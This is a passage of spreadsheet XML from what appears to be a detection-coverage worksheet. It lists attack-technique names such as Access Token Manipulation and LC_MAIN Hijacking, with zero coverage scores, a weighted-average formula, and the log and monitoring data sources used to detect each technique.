      <c r="A131" s="43" t="s">
        <v>240</v>
      </c>
      <c r="B131" s="41" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:B)</f>
        <v>Shared Modules</v>
      </c>
      <c r="C131" s="45"/>
      <c r="D131" s="45"/>
      <c r="E131" s="45"/>
      <c r="F131" s="14">
        <v>0</v>
      </c>
      <c r="G131" s="14">
        <v>0</v>
      </c>
      <c r="H131" s="14">
        <v>0</v>
      </c>
      <c r="I131" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K131" s="46" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="132" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A132" s="43" t="s">
        <v>241</v>
      </c>
      <c r="B132" s="41" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:B)</f>
        <v>Shared Modules</v>
      </c>
      <c r="C132" s="45"/>
      <c r="D132" s="45"/>
      <c r="E132" s="45"/>
      <c r="F132" s="14">
        <v>0</v>
      </c>
      <c r="G132" s="14">
        <v>0</v>
      </c>
      <c r="H132" s="14">
        <v>0</v>
      </c>
      <c r="I132" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K132" s="46" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="133" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A133" s="43" t="s">
        <v>242</v>
      </c>
      <c r="B133" s="41" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:B)</f>
        <v>Data Encoding</v>
      </c>
      <c r="C133" s="45"/>
      <c r="D133" s="45"/>
      <c r="E133" s="45"/>
      <c r="F133" s="14">
        <v>0</v>
      </c>
      <c r="G133" s="14">
        <v>0</v>
      </c>
      <c r="H133" s="14">
        <v>0</v>
      </c>
      <c r="I133" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K133" s="46" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
    </row>
    <row r="134" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A134" s="43" t="s">
        <v>243</v>
      </c>
      <c r="B134" s="41" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:B)</f>
        <v>External Remote Services</v>
      </c>
      <c r="C134" s="45"/>
      <c r="D134" s="45"/>
      <c r="E134" s="45"/>
      <c r="F134" s="14">
        <v>0</v>
      </c>
      <c r="G134" s="14">
        <v>0</v>
      </c>
      <c r="H134" s="14">
        <v>0</v>
      </c>
      <c r="I134" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K134" s="46" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
    </row>
    <row r="135" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A135" s="43" t="s">
        <v>244</v>
      </c>
      <c r="B135" s="41" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:B)</f>
        <v>Access Token Manipulation</v>
      </c>
      <c r="C135" s="45"/>
      <c r="D135" s="45"/>
      <c r="E135" s="45"/>
      <c r="F135" s="14">
        <v>0</v>
      </c>
      <c r="G135" s="14">
        <v>0</v>
      </c>
      <c r="H135" s="14">
        <v>0</v>
      </c>
      <c r="I135" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K135" s="46" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs,API monitoring,Access tokens,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="136" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A136" s="43" t="s">
        <v>245</v>
      </c>
      <c r="B136" s="41" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:B)</f>
        <v>Network Share Discovery</v>
      </c>
      <c r="C136" s="45"/>
      <c r="D136" s="45"/>
      <c r="E136" s="45"/>
      <c r="F136" s="14">
        <v>0</v>
      </c>
      <c r="G136" s="14">
        <v>0</v>
      </c>
      <c r="H136" s="14">
        <v>0</v>
      </c>
      <c r="I136" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K136" s="46" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Network protocol analysis,Process use of network</v>
      </c>
    </row>
    <row r="137" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A137" s="43" t="s">
        <v>246</v>
      </c>
      <c r="B137" s="41" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:B)</f>
        <v>Create Account</v>
      </c>
      <c r="C137" s="45"/>
      <c r="D137" s="45"/>
      <c r="E137" s="45"/>
      <c r="F137" s="14">
        <v>0</v>
      </c>
      <c r="G137" s="14">
        <v>0</v>
      </c>
      <c r="H137" s="14">
        <v>0</v>
      </c>
      <c r="I137" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K137" s="46" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</v>
      </c>
    </row>
    <row r="138" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A138" s="43" t="s">
        <v>248</v>
      </c>
      <c r="B138" s="41" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:B)</f>
        <v>Office Application Startup</v>
      </c>
      <c r="C138" s="45"/>
      <c r="D138" s="45"/>
      <c r="E138" s="45"/>
      <c r="F138" s="14">
        <v>0</v>
      </c>
      <c r="G138" s="14">
        <v>0</v>
      </c>
      <c r="H138" s="14">
        <v>0</v>
      </c>
      <c r="I138" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K138" s="46" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:C)</f>
        <v>Mail server,Process monitoring,Process command-line parameters,Windows Registry,File monitoring</v>
      </c>
    </row>
    <row r="139" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A139" s="43" t="s">
        <v>249</v>
      </c>
      <c r="B139" s="41" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:B)</f>
        <v>Add-ins</v>
      </c>
      <c r="C139" s="45"/>
      <c r="D139" s="45"/>
      <c r="E139" s="45"/>
      <c r="F139" s="14">
        <v>0</v>
      </c>
      <c r="G139" s="14">
        <v>0</v>
      </c>
      <c r="H139" s="14">
        <v>0</v>
      </c>
      <c r="I139" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K139" s="46" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Windows Registry,Process monitoring</v>
      </c>
    </row>
    <row r="140" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A140" s="43" t="s">
        <v>250</v>
      </c>
      <c r="B140" s="41" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:B)</f>
        <v>Add-ins</v>
      </c>
      <c r="C140" s="45"/>
      <c r="D140" s="45"/>
      <c r="E140" s="45"/>
      <c r="F140" s="14">
        <v>0</v>
      </c>
      <c r="G140" s="14">
        <v>0</v>
      </c>
      <c r="H140" s="14">
        <v>0</v>
      </c>
      <c r="I140" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K140" s="46" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Windows Registry,Process monitoring</v>
      </c>
    </row>
    <row r="141" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A141" s="43" t="s">
        <v>251</v>
      </c>
      <c r="B141" s="41" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C141" s="45"/>
      <c r="D141" s="45"/>
      <c r="E141" s="45"/>
      <c r="F141" s="14">
        <v>0</v>
      </c>
      <c r="G141" s="14">
        <v>0</v>
      </c>
      <c r="H141" s="14">
        <v>0</v>
      </c>
      <c r="I141" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K141" s="46" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="142" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A142" s="43" t="s">
        <v>253</v>
      </c>
      <c r="B142" s="41" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C142" s="45"/>
      <c r="D142" s="45"/>
      <c r="E142" s="45"/>
      <c r="F142" s="14">
        <v>0</v>
      </c>
      <c r="G142" s="14">
        <v>0</v>
      </c>
      <c r="H142" s="14">
        <v>0</v>
      </c>
      <c r="I142" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K142" s="46" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="143" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A143" s="43" t="s">
        <v>254</v>
      </c>
      <c r="B143" s="41" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C143" s="45"/>
      <c r="D143" s="45"/>
      <c r="E143" s="45"/>
      <c r="F143" s="14">
        <v>0</v>
      </c>
      <c r="G143" s="14">
        <v>0</v>
      </c>
      <c r="H143" s="14">
        <v>0</v>
      </c>
      <c r="I143" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K143" s="46" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="144" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A144" s="43" t="s">
        <v>255</v>
      </c>
      <c r="B144" s="41" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C144" s="45"/>
      <c r="D144" s="45"/>
      <c r="E144" s="45"/>
      <c r="F144" s="14">
        <v>0</v>
      </c>
      <c r="G144" s="14">
        <v>0</v>
      </c>
      <c r="H144" s="14">
        <v>0</v>
      </c>
      <c r="I144" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K144" s="46" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="145" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A145" s="43" t="s">
        <v>256</v>
      </c>
      <c r="B145" s="41" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C145" s="45"/>
      <c r="D145" s="45"/>
      <c r="E145" s="45"/>
      <c r="F145" s="14">
        <v>0</v>
      </c>
      <c r="G145" s="14">
        <v>0</v>
      </c>
      <c r="H145" s="14">
        <v>0</v>
      </c>
      <c r="I145" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K145" s="46" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="146" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A146" s="43" t="s">
        <v>257</v>
      </c>
      <c r="B146" s="41" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C146" s="45"/>
      <c r="D146" s="45"/>
      <c r="E146" s="45"/>
      <c r="F146" s="14">
        <v>0</v>
      </c>
      <c r="G146" s="14">
        <v>0</v>
      </c>
      <c r="H146" s="14">
        <v>0</v>
      </c>
      <c r="I146" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K146" s="46" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="147" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A147" s="43" t="s">
        <v>258</v>
      </c>
      <c r="B147" s="41" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C147" s="45"/>
      <c r="D147" s="45"/>
      <c r="E147" s="45"/>
      <c r="F147" s="14">
        <v>0</v>
      </c>
      <c r="G147" s="14">
        <v>0</v>
      </c>
      <c r="H147" s="14">
        <v>0</v>
      </c>
      <c r="I147" s="32">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="K147" s="46" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="148" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A148" s="43" t="s">
        <v>260</v>
      </c>
      <c r="B148" s="41" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C148" s="45"/>
      <c r="D148" s="45"/>
      <c r="E148" s="45"/>
      <c r="F148" s="14">
        <v>0</v>
      </c>
      <c r="G148" s="14">
        <v>0</v>
      </c>
      <c r="H148" s="14">
        <v>0</v>
      </c>
      <c r="I148" s="32">
        <f t="shared" ref="I148:I211" si="4">((F148*2)+G148+(H148*2))/5</f>
        <v>0</v>
      </c>
      <c r="K148" s="46" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="149" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A149" s="43" t="s">
        <v>261</v>
      </c>
      <c r="B149" s="41" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:B)</f>
        <v>Deobfuscate/Decode Files or Information</v>
      </c>
      <c r="C149" s="45"/>
      <c r="D149" s="45"/>
      <c r="E149" s="45"/>
      <c r="F149" s="14">
        <v>0</v>
      </c>
      <c r="G149" s="14">
        <v>0</v>
      </c>
      <c r="H149" s="14">
        <v>0</v>
      </c>
      <c r="I149" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K149" s="46" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="150" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A150" s="43" t="s">
        <v>262</v>
      </c>
      <c r="B150" s="41" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C150" s="45"/>
      <c r="D150" s="45"/>
      <c r="E150" s="45"/>
      <c r="F150" s="14">
        <v>0</v>
      </c>
      <c r="G150" s="14">
        <v>0</v>
      </c>
      <c r="H150" s="14">
        <v>0</v>
      </c>
      <c r="I150" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K150" s="46" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
    </row>
    <row r="151" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A151" s="43" t="s">
        <v>263</v>
      </c>
      <c r="B151" s="41" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C151" s="45"/>
      <c r="D151" s="45"/>
      <c r="E151" s="45"/>
      <c r="F151" s="14">
        <v>0</v>
      </c>
      <c r="G151" s="14">
        <v>0</v>
      </c>
      <c r="H151" s="14">
        <v>0</v>
      </c>
      <c r="I151" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K151" s="46" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
    </row>
    <row r="152" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A152" s="43" t="s">
        <v>264</v>
      </c>
      <c r="B152" s="41" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C152" s="45"/>
      <c r="D152" s="45"/>
      <c r="E152" s="45"/>
      <c r="F152" s="14">
        <v>0</v>
      </c>
      <c r="G152" s="14">
        <v>0</v>
      </c>
      <c r="H152" s="14">
        <v>0</v>
      </c>
      <c r="I152" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K152" s="46" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
    </row>
    <row r="153" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A153" s="43" t="s">
        <v>265</v>
      </c>
      <c r="B153" s="41" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
      <c r="C153" s="45"/>
      <c r="D153" s="45"/>
      <c r="E153" s="45"/>
      <c r="F153" s="14">
        <v>0</v>
      </c>
      <c r="G153" s="14">
        <v>0</v>
      </c>
      <c r="H153" s="14">
        <v>0</v>
      </c>
      <c r="I153" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K153" s="46" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
    </row>
    <row r="154" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A154" s="43" t="s">
        <v>266</v>
      </c>
      <c r="B154" s="41" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C154" s="45"/>
      <c r="D154" s="45"/>
      <c r="E154" s="45"/>
      <c r="F154" s="14">
        <v>0</v>
      </c>
      <c r="G154" s="14">
        <v>0</v>
      </c>
      <c r="H154" s="14">
        <v>0</v>
      </c>
      <c r="I154" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K154" s="46" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="155" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A155" s="43" t="s">
        <v>267</v>
      </c>
      <c r="B155" s="41" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C155" s="45"/>
      <c r="D155" s="45"/>
      <c r="E155" s="45"/>
      <c r="F155" s="14">
        <v>0</v>
      </c>
      <c r="G155" s="14">
        <v>0</v>
      </c>
      <c r="H155" s="14">
        <v>0</v>
      </c>
      <c r="I155" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K155" s="46" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="156" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A156" s="43" t="s">
        <v>268</v>
      </c>
      <c r="B156" s="41" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C156" s="45"/>
      <c r="D156" s="45"/>
      <c r="E156" s="45"/>
      <c r="F156" s="14">
        <v>0</v>
      </c>
      <c r="G156" s="14">
        <v>0</v>
      </c>
      <c r="H156" s="14">
        <v>0</v>
      </c>
      <c r="I156" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K156" s="46" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="157" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A157" s="43" t="s">
        <v>269</v>
      </c>
      <c r="B157" s="41" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C157" s="45"/>
      <c r="D157" s="45"/>
      <c r="E157" s="45"/>
      <c r="F157" s="14">
        <v>0</v>
      </c>
      <c r="G157" s="14">
        <v>0</v>
      </c>
      <c r="H157" s="14">
        <v>0</v>
      </c>
      <c r="I157" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K157" s="46" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="158" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A158" s="43" t="s">
        <v>270</v>
      </c>
      <c r="B158" s="41" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C158" s="45"/>
      <c r="D158" s="45"/>
      <c r="E158" s="45"/>
      <c r="F158" s="14">
        <v>0</v>
      </c>
      <c r="G158" s="14">
        <v>0</v>
      </c>
      <c r="H158" s="14">
        <v>0</v>
      </c>
      <c r="I158" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K158" s="46" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="159" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A159" s="43" t="s">
        <v>271</v>
      </c>
      <c r="B159" s="41" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C159" s="45"/>
      <c r="D159" s="45"/>
      <c r="E159" s="45"/>
      <c r="F159" s="14">
        <v>0</v>
      </c>
      <c r="G159" s="14">
        <v>0</v>
      </c>
      <c r="H159" s="14">
        <v>0</v>
      </c>
      <c r="I159" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K159" s="46" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="160" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A160" s="43" t="s">
        <v>272</v>
      </c>
      <c r="B160" s="41" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C160" s="45"/>
      <c r="D160" s="45"/>
      <c r="E160" s="45"/>
      <c r="F160" s="14">
        <v>0</v>
      </c>
      <c r="G160" s="14">
        <v>0</v>
      </c>
      <c r="H160" s="14">
        <v>0</v>
      </c>
      <c r="I160" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K160" s="46" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="161" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A161" s="43" t="s">
        <v>273</v>
      </c>
      <c r="B161" s="41" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C161" s="45"/>
      <c r="D161" s="45"/>
      <c r="E161" s="45"/>
      <c r="F161" s="14">
        <v>0</v>
      </c>
      <c r="G161" s="14">
        <v>0</v>
      </c>
      <c r="H161" s="14">
        <v>0</v>
      </c>
      <c r="I161" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K161" s="46" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="162" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A162" s="43" t="s">
        <v>274</v>
      </c>
      <c r="B162" s="41" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C162" s="45"/>
      <c r="D162" s="45"/>
      <c r="E162" s="45"/>
      <c r="F162" s="14">
        <v>0</v>
      </c>
      <c r="G162" s="14">
        <v>0</v>
      </c>
      <c r="H162" s="14">
        <v>0</v>
      </c>
      <c r="I162" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K162" s="46" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="163" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A163" s="43" t="s">
        <v>275</v>
      </c>
      <c r="B163" s="41" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C163" s="45"/>
      <c r="D163" s="45"/>
      <c r="E163" s="45"/>
      <c r="F163" s="14">
        <v>0</v>
      </c>
      <c r="G163" s="14">
        <v>0</v>
      </c>
      <c r="H163" s="14">
        <v>0</v>
      </c>
      <c r="I163" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K163" s="46" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="164" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A164" s="43" t="s">
        <v>276</v>
      </c>
      <c r="B164" s="41" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C164" s="45"/>
      <c r="D164" s="45"/>
      <c r="E164" s="45"/>
      <c r="F164" s="14">
        <v>0</v>
      </c>
      <c r="G164" s="14">
        <v>0</v>
      </c>
      <c r="H164" s="14">
        <v>0</v>
      </c>
      <c r="I164" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K164" s="46" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="165" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A165" s="43" t="s">
        <v>277</v>
      </c>
      <c r="B165" s="41" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C165" s="45"/>
      <c r="D165" s="45"/>
      <c r="E165" s="45"/>
      <c r="F165" s="14">
        <v>0</v>
      </c>
      <c r="G165" s="14">
        <v>0</v>
      </c>
      <c r="H165" s="14">
        <v>0</v>
      </c>
      <c r="I165" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K165" s="46" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="166" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A166" s="43" t="s">
        <v>278</v>
      </c>
      <c r="B166" s="41" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C166" s="45"/>
      <c r="D166" s="45"/>
      <c r="E166" s="45"/>
      <c r="F166" s="14">
        <v>0</v>
      </c>
      <c r="G166" s="14">
        <v>0</v>
      </c>
      <c r="H166" s="14">
        <v>0</v>
      </c>
      <c r="I166" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K166" s="46" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="167" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A167" s="43" t="s">
        <v>279</v>
      </c>
      <c r="B167" s="41" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C167" s="45"/>
      <c r="D167" s="45"/>
      <c r="E167" s="45"/>
      <c r="F167" s="14">
        <v>0</v>
      </c>
      <c r="G167" s="14">
        <v>0</v>
      </c>
      <c r="H167" s="14">
        <v>0</v>
      </c>
      <c r="I167" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K167" s="46" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="168" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A168" s="43" t="s">
        <v>280</v>
      </c>
      <c r="B168" s="41" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C168" s="45"/>
      <c r="D168" s="45"/>
      <c r="E168" s="45"/>
      <c r="F168" s="14">
        <v>0</v>
      </c>
      <c r="G168" s="14">
        <v>0</v>
      </c>
      <c r="H168" s="14">
        <v>0</v>
      </c>
      <c r="I168" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K168" s="46" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="169" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A169" s="43" t="s">
        <v>281</v>
      </c>
      <c r="B169" s="41" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C169" s="45"/>
      <c r="D169" s="45"/>
      <c r="E169" s="45"/>
      <c r="F169" s="14">
        <v>0</v>
      </c>
      <c r="G169" s="14">
